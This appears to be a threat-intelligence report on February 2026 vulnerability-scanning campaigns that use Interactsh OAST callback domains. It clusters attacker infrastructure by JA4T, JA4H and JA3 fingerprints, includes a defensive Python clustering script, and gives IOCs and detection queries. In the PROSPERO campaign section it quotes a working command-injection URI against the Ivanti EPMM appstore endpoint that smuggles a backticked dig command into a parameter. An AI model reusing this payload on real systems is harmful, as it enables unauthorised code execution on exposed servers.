# Full Report
## Overview

OAST domains appeared across multiple HTTP fields: request bodies (4,331 occurrences, 52.8%), URI paths (1,709, 20.8%), request header values (1,272, 15.5%), URL paths (392, 4.8%), cookies (383, 4.7%), and user-agent strings (122, 1.5%). The distribution across multiple injection vectors indicates automated vulnerability scanning toolkits that embed callback domains into every exploitable parameter.

Five Interactsh domain variants were observed: oast.pro (4,182 occurrences across 22 campaigns), oast.live (1,970, 21 campaigns), oast.fun (857, 16 campaigns), oast.me (767, 11 campaigns), and oast.site (433, 13 campaigns). All domains used the standard Interactsh encoding format with campaign, machine_id, PID, and nonce fields.

JA4T TCP fingerprint analysis (sourced from raw session data) identified three dominant infrastructure clusters: a Cloudflare proxy signature (MSS 1380, 2,973 sessions), a standard Linux stack (MSS 1460, 1,124 sessions), and an anomalous localhost-like signature (MSS 65495, 1,276 sessions across two window size variants) characteristic of Nuclei and similar scanning frameworks.

NOTE: This edition contains a supplemental deep-dive section on selected OAST infrastructure components.

## Temporal Analysis

Activity peaked during the first two days of the observation window, then declined:

| Day | OAST Count | Sessions | Unique IPs |
|---|---|---|---|
| Feb 7 | 2,757 | 2,233 | 18 |
| Feb 8 | 2,045 | 1,765 | 20 |
| Feb 9 | 566 | 373 | 16 |
| Feb 10 | 1,016 | 562 | 37 |
| Feb 11 | 1,011 | 781 | 16 |
| Feb 12 | 553 | 362 | 6 |
| Feb 13 | 261 | 121 | 11 |

The Feb 7-8 peak corresponds to the dominant ibe4q campaign (Cloudflare-proxied infrastructure). February 10 saw a spike in unique IPs (37) despite moderate session volume, indicating new scanner infrastructure rotating in. Burst analysis identified concentrated activity windows at Feb 8 16:00-17:00 UTC (330+323 sessions) and Feb 11 20:00 UTC (258 sessions), both associated with Oracle Cloud-based scanning.
## Campaign Analysis

The 73 campaigns cluster into distinct operational groups based on infrastructure, timing, and payload overlap.

### Campaign Group 1: Cloudflare-Proxied Scanning (ibe4q, bjibe)

The largest campaign cluster, ibe4q, generated 3,157 OAST domain occurrences across 2,759 sessions from 9 Cloudflare-proxied IPs (AS13335), all geolocated to Brazil. Activity ran from Feb 7 00:00 UTC through Feb 9 05:35 UTC. A related campaign, bjibe (238 occurrences, 202 sessions, 8 IPs), operated concurrently from Feb 7-8. Both campaigns share the same machine_id and use all six OAST injection vectors (requestBody, uri, path, requestCookie, requestHeaderValue, useragent), indicating a comprehensive vulnerability scanning toolkit.

Top IPs: 104.28.193.87 (1,158 sessions), 104.28.193.83 (418), 104.28.193.82 (379), 104.28.193.84 (277), 104.28.225.85 (262).

JA4T fingerprint: 65535_2-4-8-1-3_1380_13 (uniform across all 9 IPs). The MSS 1380 confirms Cloudflare tunnel/proxy traversal. The Cloudflare proxy masks the true origin infrastructure; the Brazilian geolocation likely reflects Cloudflare edge selection rather than attacker location.

### Campaign Group 2: Oracle Cloud Multi-Campaign Scanners

Four Oracle Corporation IPs (AS31898) operated across 13 campaigns with 1,243 total sessions:

| IP | Country | Campaigns | Sessions | Active Period |
|---|---|---|---|---|
| 204.216.147.144 | Brazil | 5 (37d6c, b7d6c, fhr7d, j7d6c, r7d6c) | 591 | Feb 8-11 |
| 147.224.178.225 | United States | 4 (3fk04, gt3fk, jfk04, rfk04) | 365 | Feb 10-11 |
| 168.107.59.85 | South Korea | 1 (c9ndh) | 198 | Feb 12 |
| 144.24.88.37 | South Korea | 3 (3grt7, 3t7nn, rt7nn) | 89 | Feb 8-10 |

GreyNoise first observed 204.216.147.144 on 2024-09-10 (35,367 total hits across 8 sensors), indicating established scanning infrastructure. IP 147.224.178.225 first appeared 2026-02-01 (23,109 hits, 10 sensors) and carries GreyNoise tags for both CVE-2026-1281 (Ivanti EPMM) and CVE-2026-0770.
All Oracle IPs used path, requestBody, requestCookie, requestHeaderValue, and uri injection vectors, the broadest payload diversity observed.

JA4T fingerprint: primarily 64240_2-4-8-1-3_1460_7 (standard Linux), consistent across 204.216.147.144, 168.107.59.85, and 144.24.88.37. However, 147.224.178.225 uses both the standard Linux fingerprint (132 sessions) and the Nuclei/loopback fingerprint 65495_2-4-8-1-3_65495_7 (233 sessions), indicating dual-tool deployment, possibly a standard scanner plus Nuclei on the same host.

### Campaign Group 3: Private Layer / Switzerland (7gveu)

A single IP, 179.43.146.42 (AS51852, Private Layer INC, Switzerland), generated 511 OAST domains across 456 sessions in campaign 7gveu, active throughout the entire observation window (Feb 7-13). GreyNoise first observed this IP on 2026-02-03 (43,110 hits across 38 sensors). The sustained, continuous scanning pattern across 7 days suggests automated, unattended operation. All six injection vectors were used.

JA4T fingerprint: primarily 32120_2-4-8-1-3_1460_7 (350 sessions), a non-standard TCP window size of 32120 that serves as a strong single-actor indicator. This IP also exhibited 65495_2-4-8-1-3_65495_7 (106 sessions), indicating it runs Nuclei alongside a custom scanning tool with a distinctive TCP stack.

### Campaign Group 4: PROSPERO OOO / Ivanti EPMM Exploitation (f984d, il84d, ito4d, fbg4d)

IP 193.24.123.42 (AS200593, PROSPERO OOO, Russia) operated 4 campaigns with 169 sessions between Feb 7-8. This IP stands out for exclusive exploitation of CVE-2026-1281 (Ivanti Endpoint Manager Mobile Code Injection). URI analysis reveals a specific exploit pattern targeting the Ivanti EPMM app store endpoint:

```text
/mifs/c/appstore/fob/3/5/sha256:kid=1,st=theValue,et=1770526185, h=gPath[`dig > /dev/null`]/39IUqFPJtv5RscnibeX4OUpsHTa.ipa
```

The payload injects a dig command via the gPath parameter to trigger DNS callbacks to OAST domains, confirming command execution.
Target IPs in the 38.48.0.0/24 range (GreyNoise sensor space) were systematically enumerated. OAST domains were found only in path and uri fields, consistent with this specific exploit vector.

JA4T fingerprint: 65495_2-4-8-1-3_65495_7 (166 sessions) with a secondary 33280_2-4-8-1-3_65495_7 (3 sessions). The MSS 65495 confirms Nuclei-based tooling, consistent with the Interactsh OAST integration. GreyNoise has tracked this IP since 2025-06-12 (147,752 total hits across 2,770 sensors).

One additional IP, from AS215730, also triggered the CVE-2026-1281 tag via campaign hag80.

### Campaign Group 5: AS215540 / GCS LLP (ka1vu, geka1)

IP 46.29.235.157 (AS215540, GLOBAL CONNECTIVITY SOLUTIONS LLP, Netherlands) ran 2 campaigns with 287 sessions between Feb 8-9. GreyNoise first observed this IP on 2026-02-08 (9,881 hits, 6 sensors), so it appeared in GreyNoise records at the same time as this observation window. The IP shares JA3 fingerprint 11a384388ad36777e1a2e121495037fe with two other IPs (45.138.101.232 and 37.60.230.90), suggesting common scanning tooling.

JA4T analysis reveals three distinct TCP fingerprints from this single IP: 64240_2-1-3-1-1-4_1400_8 (165 sessions, primary), 65495_2-4-8-1-3_65495_7 (69 sessions), and 33280_2-4-8-1-3_65495_7 (25 sessions). The primary fingerprint uses non-standard TCP option ordering (2-1-3-1-1-4 vs the Linux default 2-4-8-1-3) and MSS 1400, consistent with a VPN or WireGuard tunnel. The two secondary fingerprints (MSS 65495) indicate concurrent Nuclei deployment. This IP runs at least two distinct scanning tools through different network paths.

### Campaign Group 6: Vietnamese Infrastructure (p7a5r, 97a5r, mt4kp)

Two Vietnamese hosting providers contributed 375 sessions:

- 103.144.87.192 (AS135932, Viet Storage): campaigns p7a5r and 97a5r, 264 sessions, Feb 9-13. Generated 1,177 unique OAST domains across only 264 sessions, the highest domain-to-session ratio observed, indicating payload reuse or multi-vector injection per session.
- 103.252.93.81 (AS135918, Viet Digital): campaign mt4kp, 111 sessions, Feb 9-10. OAST domains embedded exclusively in requestBody, consistent with Log4j/deserialization-focused exploitation.

### Campaign Group 7: Estonian Infrastructure (asgsb)

IP 45.138.101.232 (AS41745, Baykov Ilya Sergeevich, Estonia) ran campaign asgsb with 130 sessions on Feb 11. GreyNoise first observed this IP on 2026-02-11 (10,524 hits, 6 sensors): brand new infrastructure. It shares the JA3 fingerprint with the AS215540 and Contabo IPs.

JA4T fingerprint: 64860_2-4-8-1-3_1380_7. The MSS 1380 matches the Cloudflare cluster's tunnel signature, but the window size (64860) and TTL (7) differ from Cloudflare's 65535..13. This suggests a different tunnel provider or VPN with similar MTU constraints. The unique JA4T, combined with the shared JA3, indicates the same TLS-layer scanner tool deployed behind a different network tunnel than the AS215540 and Contabo nodes.

## Payload Analysis

GreyNoise tags identified 100+ distinct CVE exploitation techniques across the session data.
The top exploitation categories:

| Category and tag | Occurrences | Unique IPs |
|---|---|---|
| Log4j RCE: Apache Log4j RCE Attempt | 2,131 | 26 |
| Linux Command Injection: Generic Suspicious Linux Command in Request | 1,703 | 54 |
| Ivanti EPMM: CVE-2026-1281 RCE Attempt | 344 | 2 |
| XSS Probing: Generic XSS Commands in Request | 320 | 25 |
| Fastjson RCE: Fastjson RCE Attempt | 305 | 19 |
| Path Traversal: Generic Path Traversal Attempt | 178 | 18 |
| Apache OFBiz: CVE-2024-32113 Path Traversal | 135 | 7 |
| Apache OFBiz: Authentication Bypass Attempt | 123 | 6 |
| Cisco HyperFlex: HX RCE Vuln Check | 114 | 30 |
| GPON Router: CVE-2018-10561 Router Worm | 114 | 10 |
| XStream RCE: Generic XStream RCE Attempt | 88 | 19 |
| Atlassian Confluence: CVE-2022-26134 OGNL Injection | 78 | 7 |
| Spring Cloud Gateway: Code Injection | 73 | 12 |
| XStream: CVE-2021-39152 Input Stream | 66 | 10 |

Notable CVE targets by recency:

- CVE-2026-1281 (Ivanti EPMM Code Injection): 344 occurrences, 2 IPs. Active exploitation of a 2026 vulnerability.
- CVE-2026-0770: tagged on IP 147.224.178.225 (Oracle Cloud).
- CVE-2025-4123 (Grafana Path Traversal XSS): 44 occurrences, 8 IPs.
- CVE-2025-2777/2775/2776 (SysAid On-Prem XXE): 21 occurrences each, 6 IPs.
- CVE-2025-34028 (Commvault Command Center RCE): 21 occurrences, 6 IPs.
- CVE-2025-8943 (Flowise Authentication Bypass RCE): 18 occurrences, 5 IPs.
- CVE-2025-8085 (Ditty WordPress Plugin): 15 occurrences, 3 IPs.

The payload arsenal spans enterprise software (Oracle WebLogic, SAP, Atlassian, Adobe ColdFusion), network appliances (Cisco, Sophos, Palo Alto, Draytek), IoT/consumer devices (GPON, WAVLINK, D-Link, LG), and emerging AI/ML infrastructure (Ollama, Flowise, Anyscale Ray).
## Infrastructure Analysis

### JA4T TCP Fingerprint Clustering

JA4T fingerprints extracted from raw session data reveal three distinct TCP stack clusters accounting for 98.6% of OAST sessions:

| JA4T Fingerprint | Window | MSS | TTL | Sessions | IPs | ASNs | Interpretation |
|---|---|---|---|---|---|---|---|
| 65535_2-4-8-1-3_1380_13 | 65535 | 1380 | 13 | 2,973 | 9 | 1 | Cloudflare proxy/tunnel |
| 64240_2-4-8-1-3_1460_7 | 64240 | 1460 | 7 | 1,124 | 18 | 10 | Standard Linux (cloud VPS) |
| 65495_2-4-8-1-3_65495_7 | 65495 | 65495 | 7 | 1,082 | 26 | 22 | Nuclei/loopback scanning |
| 32120_2-4-8-1-3_1460_7 | 32120 | 1460 | 7 | 350 | 1 | 1 | Private Layer (custom stack) |
| 33280_2-4-8-1-3_65495_7 | 33280 | 65495 | 7 | 194 | 8 | 8 | Nuclei variant (alt window) |
| 64240_2-1-3-1-1-4_1400_8 | 64240 | 1400 | 8 | 193 | 1 | 1 | AS215540 primary tool |
| 64860_2-4-8-1-3_1380_7 | 64860 | 1380 | 7 | 130 | 1 | 1 | Estonian scanner (tunnel) |

**Cluster 1: Cloudflare Proxy (MSS 1380, 2,973 sessions).** The fingerprint 65535_2-4-8-1-3_1380_13 is exclusive to AS13335 (Cloudflare). The MSS 1380 value (20 bytes below the standard 1400 for tunneled traffic) confirms these sessions traverse a Cloudflare tunnel or Workers proxy. The maximum window size (65535) and TTL of 13 (initial TTL 64 minus ~51 hops through proxy infrastructure) are consistent with Cloudflare's edge network. All 9 IPs in the 104.28.193.x and 104.28.225.x ranges share this identical fingerprint.

**Cluster 2: Standard Linux VPS (MSS 1460, 1,124 sessions).** The fingerprint 64240_2-4-8-1-3_1460_7 represents a default Linux TCP stack (window 64240, standard Ethernet MSS 1460, TTL 7 = initial 64 minus ~57 hops). This cluster spans 18 IPs across 10 ASNs including Oracle (AS31898), Contabo (AS51167), and DigitalOcean (AS14061). Key IPs: 204.216.147.144 (Oracle, 591 sessions), 168.107.59.85 (Oracle, 198 sessions), 144.24.88.37 (Oracle, 89 sessions), 37.60.230.90 (Contabo, 87 sessions). The Oracle Cloud IPs all share this fingerprint, supporting their grouping as a single operational cluster.
**Cluster 3: Nuclei/Loopback Scanner (MSS 65495, 1,276 sessions).** Two fingerprint variants share the anomalous MSS value of 65495: 65495_2-4-8-1-3_65495_7 (1,082 sessions, 26 IPs) and 33280_2-4-8-1-3_65495_7 (194 sessions, 8 IPs). MSS 65495 is the Linux loopback interface MSS (65535 minus 40 bytes TCP/IP overhead), indicating the scanning tool binds to a loopback address or uses a local proxy before egressing. This is a known signature of Nuclei and Interactsh-integrated scanning frameworks. The cluster spans 22 ASNs across 14 countries, the widest geographic distribution of any fingerprint, consistent with a widely deployed open-source tool.

Notable MSS 65495 users:

- 147.224.178.225 (Oracle, US): 233 sessions; uses both standard Linux and Nuclei fingerprints across different campaigns.
- 193.24.123.42 (PROSPERO, Russia): 166 sessions; Ivanti EPMM exploitation.
- 103.144.87.192 (Viet Storage): 135 sessions with MSS 65495, plus 129 sessions with the window 33280 variant.
- 179.43.146.42 (Private Layer): 106 sessions (secondary fingerprint alongside its primary 32120 stack).
- Tor exit nodes (Emerald Onion, Stiftung Erneuerbare Freiheit): tau2 campaigns.

**Multi-Fingerprint IPs.** Twelve IPs exhibited multiple JA4T fingerprints, indicating either multiple scanning tools or configuration changes during operation. The most notable is 46.29.235.157 (AS215540) with three distinct fingerprints: 64240_2-1-3-1-1-4_1400_8 (165 sessions, primary tool), 65495_2-4-8-1-3_65495_7 (69 sessions, Nuclei), and 33280_2-4-8-1-3_65495_7 (25 sessions, Nuclei variant). The primary fingerprint uses non-standard TCP options (2-1-3-1-1-4 vs the typical 2-4-8-1-3) and MSS 1400, suggesting a VPN or tunnel endpoint.
### JA4T + JA4H Combined Clustering

Cross-referencing TCP and HTTP fingerprints identifies the tightest infrastructure groupings:

| JA4T | JA4H | Sessions | IPs | ASNs | Assessment |
|---|---|---|---|---|---|
| 65535..1380_13 | po11nn06..4ea4093e6290 | 997 | 9 | 1 | Cloudflare cluster, POST w/ 6 headers |
| 64240..1460_7 | po11nn06..4ea4093e6290 | 330 | 5 | 2 | Linux VPS, same HTTP toolkit |
| 65535..1380_13 | ge11nn04..532a1ee47909 | 310 | 9 | 1 | Cloudflare cluster, GET w/ 4 headers |
| 65495..65495_7 | ge11nn04..532a1ee47909 | 282 | 14 | 12 | Nuclei, GET variant |
| 65495..65495_7 | po11nn06..4ea4093e6290 | 279 | 11 | 11 | Nuclei, POST variant |

The Cloudflare proxy cluster uses both POST-heavy (po11nn06) and GET-heavy (ge11nn04) HTTP patterns but shares a single JA4T fingerprint, confirming a unified origin behind the proxy. The Nuclei cluster uses the same HTTP fingerprint variants but from 22+ different ASNs: the HTTP toolkit is shared, but the TCP signature betrays the loopback scanning architecture.

### Tor Exit Node Cluster (tau2 campaigns)

The tau2 campaign family (atau2, itau2, 2tau2, qtau2) operated across 23 sessions from privacy-focused infrastructure:

| ASN | Organization | IPs | Sessions | JA4T Fingerprints |
|---|---|---|---|---|
| AS60729 | Stiftung Erneuerbare Freiheit | 3 | 4 | 3 distinct |
| AS396507 | Emerald Onion | 3 | 4 | 3 distinct |
| AS214503 | QuxLabs AB | 2 | 2 | 2 distinct |
| AS210558 | 1337 Services GmbH | 2 | 2 | 2 distinct |
| AS208323 | Foundation for Applied Privacy | 2 | 2 | 1 distinct |
| AS215125 | Church of Cyberology | 2 | 2 | 2 distinct |
| AS399629 | BL Networks | 1 | 3 | 2 distinct |
| AS214209 | Internet Magnate (Pty) Ltd | 2 | 3 | 2 distinct |

All are known Tor exit node operators or privacy-focused hosting providers. The multiple JA4T fingerprints per ASN reflect the heterogeneous nature of Tor exit infrastructure (each exit node has its own TCP stack). Low session counts per IP (1-2) are consistent with Tor circuit rotation. The tau2 campaigns use MSS 65495 (Nuclei), standard 1460 (Linux), and 1436/1452 (VPN tunnels), indicating the scanning tool runs behind Tor with varying exit paths.
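The two-layer clustering described above (a JA4T TCP-stack signature paired with a JA4H HTTP-shape signature, then a check for IPs that present more than one TCP stack) is straightforward to script. The following is an added example, not GreyNoise's tooling: the fingerprint strings and IPs are the ones quoted in this report, but the session records pairing them are constructed sample data, and the cluster labels encode this report's interpretation of each stack (MSS 65495 as loopback/Nuclei, non-default option order as a VPN or tunnel, MSS 1380 with window 65535 as the Cloudflare proxy). The fourth JA4T field is carried as an opaque string: this report labels it TTL, while the published JA4T definition names it the window scale; the classifier does not key on it either way.

```python
"""JA4T / JA4H fingerprint parsing and clustering over constructed session records.

Added example; not GreyNoise code. Cluster labels follow this report's reading of
each fingerprint. SESSIONS is constructed sample data, not observed counts.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple

# Constructed sample sessions: (source IP, JA4T, JA4H_a prefix). IPs and fingerprints are
# the report's values; the pairings and their frequencies here are illustrative only.
SESSIONS: List[Tuple[str, str, str]] = [
    ("104.28.193.87",   "65535_2-4-8-1-3_1380_13",  "po11nn060000"),
    ("104.28.193.87",   "65535_2-4-8-1-3_1380_13",  "ge11nn040000"),
    ("204.216.147.144", "64240_2-4-8-1-3_1460_7",   "po11nn060000"),
    ("147.224.178.225", "64240_2-4-8-1-3_1460_7",   "po11nn060000"),
    ("147.224.178.225", "65495_2-4-8-1-3_65495_7",  "ge11nn040000"),
    ("179.43.146.42",   "32120_2-4-8-1-3_1460_7",   "po11nn060000"),
    ("46.29.235.157",   "64240_2-1-3-1-1-4_1400_8", "po11nn060000"),
    ("46.29.235.157",   "33280_2-4-8-1-3_65495_7",  "ge11nn040000"),
    ("203.0.113.9",     "65495_2-4-8-1-3_65495_7",  "ge11nr17${jn"),  # Log4j fragment in language slot
]

LINUX_DEFAULT_OPTIONS = "2-4-8-1-3"  # TCP option order of a stock Linux SYN
LOOPBACK_MSS = 65495                 # 65535 minus 40 bytes TCP/IP overhead: loopback MSS


@dataclass(frozen=True)
class JA4T:
    window: int
    options: str
    mss: int
    last: str  # fourth field: labelled TTL in this report, window scale in the JA4T spec


def parse_ja4t(fp: str) -> JA4T:
    """Split 'window_options_mss_last' into typed fields."""
    window, options, mss, last = fp.split("_")
    return JA4T(int(window), options, int(mss), last)


def classify_ja4t(fp: str) -> str:
    """Map a JA4T string to this report's cluster labels: MSS first, then option order, then window."""
    t = parse_ja4t(fp)
    if t.mss == LOOPBACK_MSS:
        return "nuclei-loopback"          # both the 65495 and the 33280 window variants
    if t.options != LINUX_DEFAULT_OPTIONS:
        return "vpn-or-tunnel-stack"      # e.g. 2-1-3-1-1-4 seen from AS215540
    if t.mss == 1380:
        return "cloudflare-proxy" if t.window == 65535 else "tunnel-mss-1380"
    if t.mss == 1460 and t.window == 64240:
        return "linux-default"
    return "custom-stack"                 # e.g. window 32120 from Private Layer


def parse_ja4h_a(prefix: str) -> Dict[str, object]:
    """Decode the 12-char JA4H_a section: method, version, cookie flag, referer flag, header count, language."""
    return {
        "method": prefix[0:2],            # "po" POST, "ge" GET
        "version": prefix[2:4],           # "11" = HTTP/1.1
        "cookie": prefix[4] == "c",       # "n" = no Cookie header
        "referer": prefix[5] == "r",      # "n" = no Referer header
        "header_count": int(prefix[6:8]),
        "language": prefix[8:12],         # first 4 chars of Accept-Language; "${jn" means a Log4j payload sat there
    }


def cluster_sessions(sessions) -> List[Tuple[str, str, int, int]]:
    """Group by (JA4T, JA4H_a); return (ja4t, ja4h, sessions, unique IPs), most sessions first."""
    counts = Counter((t, h) for _, t, h in sessions)
    ips = defaultdict(set)
    for ip, t, h in sessions:
        ips[(t, h)].add(ip)
    return [(t, h, n, len(ips[(t, h)])) for (t, h), n in counts.most_common()]


def multi_fingerprint_ips(sessions) -> Dict[str, List[str]]:
    """IPs that presented more than one JA4T: the report's dual-tool indicator."""
    seen = defaultdict(set)
    for ip, t, _ in sessions:
        seen[ip].add(t)
    return {ip: sorted(fps) for ip, fps in seen.items() if len(fps) > 1}


if __name__ == "__main__":
    for t, h, n, k in cluster_sessions(SESSIONS):
        print(f"{t:26} {h:14} sessions={n} ips={k} -> {classify_ja4t(t)}")
    print("multi-fingerprint IPs:", multi_fingerprint_ips(SESSIONS))
```

Ordering the classifier by MSS first mirrors the report's reasoning: the loopback MSS is the strongest single discriminator, option order separates tunnelled stacks regardless of window, and only then do window sizes split the MSS 1380 and MSS 1460 families.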
### JA4H HTTP Fingerprint Clustering

The top JA4H fingerprints span multiple JA4T clusters, confirming shared HTTP-layer tooling across distinct network-layer infrastructure:

| JA4H Fingerprint | Unique IPs | ASNs | Occurrences |
|---|---|---|---|
| po11nn060000_4ea4093e6290 | 28 | 16 | 1,933 |
| ge11nn040000_532a1ee47909 | 36 | 18 | 828 |
| po11nn08en00_9cf61e78b7a7 | 22 | 11 | 449 |
| po11nn060000_da66f5d9ff4c | 16 | 10 | 243 |
| po11nr070000_6b557635aee2 | 18 | 7 | 223 |

The dominant fingerprint po11nn060000_4ea4093e6290 appeared across 28 IPs in 16 ASNs spanning 12 countries. The po11 prefix indicates HTTP/1.1 POST requests with no cookies or referer. This distribution is consistent with widely deployed scanning tooling (Nuclei or similar frameworks).

One JA4H fingerprint, ge11nr17${jn_8062e975b6e7, contains a JNDI injection fragment in the hash: the ${jn prefix indicates Log4j payloads embedded in HTTP headers that propagated into the fingerprint computation. This appeared across 13 IPs in 8 ASNs.

### Shared JA3 Fingerprint Cluster

Three IPs share JA3 fingerprint 11a384388ad36777e1a2e121495037fe:

| IP | ASN | Country | First Seen | Sessions | JA4T |
|---|---|---|---|---|---|
| 46.29.235.157 | AS215540 (GCS LLP) | Netherlands | 2026-02-08 | 287 | 3 distinct |
| 45.138.101.232 | AS41745 (Baykov) | Estonia | 2026-02-11 | 132 | 64860..1380_7 |
| 37.60.230.90 | AS51167 (Contabo) | France | 2026-01-12 | 87 | 64240..1460_7 |

All three IPs appeared in GreyNoise records within the past 5 weeks. The shared JA3 fingerprint across three distinct ASNs suggests a common TLS library and configuration. Despite sharing JA3, their JA4T fingerprints differ: AS215540 uses three TCP stacks (including the unusual 2-1-3-1-1-4 option ordering), Estonia uses MSS 1380 (tunnel), and Contabo uses standard Linux. This indicates the same application-layer tool deployed across different network configurations.

### ASN Distribution

| ASN | Organization | Sessions | IPs | Campaigns |
|---|---|---|---|---|
| AS13335 | Cloudflare, Inc. | 2,987 | 20 | 5 |
| AS31898 | Oracle Corporation | 1,243 | 4 | 13 |
| AS51852 | Private Layer INC | 456 | 1 | 1 |
| AS215540 | Global Connectivity Solutions LLP | 287 | 1 | 2 |
| AS135932 | Viet Storage | 264 | 1 | 2 |
| AS200593 | PROSPERO OOO | 169 | 1 | 4 |
| AS41745 | Baykov Ilya Sergeevich | 132 | 1 | 1 |
| AS135918 | Viet Digital Technology | 111 | 1 | 1 |
| AS14061 | DigitalOcean, LLC | 91 | 9 | 11 |
| AS51167 | Contabo GmbH | 87 | 1 | 5 |

PROSPERO OOO (AS200593) is a hosting provider with a documented history of enabling malicious activity. The combination of PROSPERO hosting and exclusive CVE-2026-1281 exploitation represents the most operationally distinct cluster in this dataset.

## Attribution Assessment

Confidence: Low-Medium. The data supports identification of distinct operational clusters but not definitive attribution to specific threat actors.

What the data shows:

- At least 5-7 operationally distinct groups based on infrastructure, campaign patterns, and payload focus.
- JA4T fingerprinting strengthens cluster boundaries: three TCP stack families (Cloudflare MSS 1380, standard Linux MSS 1460, Nuclei MSS 65495) cleanly partition the dataset.
- The PROSPERO/Ivanti EPMM cluster is the most clearly differentiated, with exclusive focus on CVE-2026-1281 and a specific dig-based command injection payload, running Nuclei (MSS 65495).
- Oracle Cloud IPs operate the broadest vulnerability scanning toolkit across the most campaigns (13), with a consistent standard Linux TCP stack (64240_2-4-8-1-3_1460_7), suggesting a scanning-as-a-service or bug bounty automation platform.
- The shared JA3 fingerprint across AS215540/AS41745/Contabo points to common TLS tooling, but divergent JA4T fingerprints reveal different network-layer configurations (VPN tunnel, tunnel MSS 1380, standard Linux).
- Private Layer IP 179.43.146.42 has a unique JA4T window size (32120) that serves as a high-confidence single-actor tracking identifier.
- 12 IPs exhibited multiple JA4T fingerprints, indicating dual-tool deployment (typically a primary scanner + Nuclei).
- Cloudflare-proxied infrastructure has a uniform JA4T (65535_2-4-8-1-3_1380_13 across all 9 IPs), consistent with a single origin behind the proxy.

What remains unknown:

- Whether the Cloudflare-proxied traffic represents one actor or multiple actors behind a shared proxy (the uniform JA4T suggests a single origin, but Cloudflare normalizes TCP characteristics).
- The relationship, if any, between Oracle Cloud campaigns (campaign IDs share partial suffixes like 7d6c and fk04, suggesting sequential tool runs from the same operator; uniform JA4T supports the single-operator hypothesis).
- Whether Vietnamese infrastructure represents independent operators or a shared hosting platform (both IPs use MSS 65495 Nuclei fingerprints but with different window sizes, suggesting different host configurations).

## Network IOCs

Primary IPs (by session volume):

| IP | ASN | Country | Sessions | Campaigns | GreyNoise Classification |
|---|---|---|---|---|---|
| 104.28.193.87 | AS13335 | Brazil | 1,158 | 3 | Malicious |
| 204.216.147.144 | AS31898 | Brazil | 591 | 5 | Malicious |
| 179.43.146.42 | AS51852 | Switzerland | 456 | 1 | Malicious |
| 104.28.193.83 | AS13335 | Brazil | 418 | 2 | Malicious |
| 104.28.193.82 | AS13335 | Brazil | 379 | 2 | Malicious |
| 147.224.178.225 | AS31898 | United States | 365 | 4 | Malicious |
| 46.29.235.157 | AS215540 | Netherlands | 287 | 2 | Malicious |
| 103.144.87.192 | AS135932 | Vietnam | 264 | 2 | Malicious |
| 193.24.123.42 | AS200593 | Russia | 169 | 4 | Malicious |
| 45.138.101.232 | AS41745 | Estonia | 132 | 1 | Malicious |
| 103.252.93.81 | AS135918 | Vietnam | 111 | 1 | Malicious |
| 168.107.59.85 | AS31898 | South Korea | 198 | 1 | Malicious |
| 37.60.230.90 | AS51167 | France | 87 | 5 | Malicious |

OAST Domains/Providers: all domains use the Interactsh OAST platform across five TLDs:

- *.oast.pro (4,182 occurrences, 22 campaigns)
- *.oast.live (1,970, 21 campaigns)
- *.oast.fun (857, 16 campaigns)
- *.oast.me (767, 11 campaigns)
- *.oast.site (433, 13 campaigns)

JA4T TCP Fingerprints (for detection):

- 65535_2-4-8-1-3_1380_13: Cloudflare proxy cluster (2,973 sessions, 9 IPs)
- 65495_2-4-8-1-3_65495_7: Nuclei/loopback scanner (1,082 sessions, 26 IPs, 22 ASNs)
- 33280_2-4-8-1-3_65495_7: Nuclei variant (194 sessions, 8 IPs)
- 32120_2-4-8-1-3_1460_7: Private Layer custom stack (350 sessions, 1 IP)
- 64240_2-1-3-1-1-4_1400_8: AS215540 VPN/tunnel tool (193 sessions, 1 IP)
- 64860_2-4-8-1-3_1380_7: Estonian tunnel scanner (130 sessions, 1 IP)

JA4H HTTP Fingerprints (for detection):

- po11nn060000_4ea4093e6290_000000000000_000000000000 (1,933 occurrences)
- ge11nn040000_532a1ee47909_000000000000_000000000000 (828 occurrences)
- po11nn08en00_9cf61e78b7a7_000000000000_000000000000 (449 occurrences)

Shared JA3 Fingerprint: 11a384388ad36777e1a2e121495037fe (used by 46.29.235.157, 45.138.101.232, 37.60.230.90)

## Detection Recommendations

- Block or alert on PROSPERO OOO infrastructure (AS200593, specifically 193.24.123.42): this ASN has a documented history of hosting malicious operations and was observed exclusively targeting CVE-2026-1281.
- Prioritize patching for CVE-2026-1281 (Ivanti Endpoint Manager Mobile Code Injection): active exploitation observed with functional dig-based command injection payloads targeting the /mifs/c/appstore/fob/ endpoint.
- Monitor for Interactsh callback domains (*.oast.pro, *.oast.live, *.oast.fun, *.oast.me, *.oast.site) in DNS logs, HTTP request bodies, URI paths, cookies, headers, and user-agent strings.
- Alert on the shared JA3 fingerprint 11a384388ad36777e1a2e121495037fe associated with the coordinated scanning cluster across AS215540, AS41745, and Contabo.
- Detect Nuclei-based scanning via JA4T: MSS 65495 (fingerprints 65495_2-4-8-1-3_65495_7 and 33280_2-4-8-1-3_65495_7) is a high-fidelity indicator of loopback-proxied scanning tools. This signature accounted for 1,276 sessions (20.6%) across 26 IPs and 22 ASNs.
- Track the Private Layer custom TCP stack: JA4T 32120_2-4-8-1-3_1460_7 (window 32120) is unique to IP 179.43.146.42 and provides a single-actor tracking fingerprint for this sustained 7-day scanner.
- Review exposure to 2025-2026 CVEs actively targeted: CVE-2025-4123 (Grafana), CVE-2025-2775/2776/2777 (SysAid), CVE-2025-34028 (Commvault), CVE-2025-8943 (Flowise), CVE-2025-61882 (Oracle E-Business Suite).
- WAF rules: block requests containing oast.pro, oast.live, oast.fun, oast.me, oast.site in any HTTP field. These domains have no legitimate use in production traffic.
- Monitor Oracle Cloud ranges (AS31898) for broad vulnerability scanning: 4 IPs operated 13 campaigns across 3 countries, using standard Linux TCP stacks (64240_2-4-8-1-3_1460_7).

## GNQL Queries

Sessions containing OAST callback domains in the past 7 days:

```text
tags:"Contains Well-known Out-of-band Interaction Domain" last_seen:7d
```

PROSPERO OOO infrastructure (Ivanti EPMM exploitation):

```text
metadata.asn:AS200593 last_seen:7d
```

Oracle Cloud scanning infrastructure:

```text
metadata.asn:AS31898 last_seen:7d tags:"Contains Well-known Out-of-band Interaction Domain"
```

Shared JA3 cluster:

```text
raw_data.ja3.fingerprint:11a384388ad36777e1a2e121495037fe last_seen:7d
```

CVE-2026-1281 exploitation:

```text
tags:"Ivanti Endpoint Manager Mobile Code Injection CVE-2026-1281 RCE Attempt" last_seen:7d
```

AS215540 (new scanning infrastructure):

```text
metadata.asn:AS215540 last_seen:7d
```

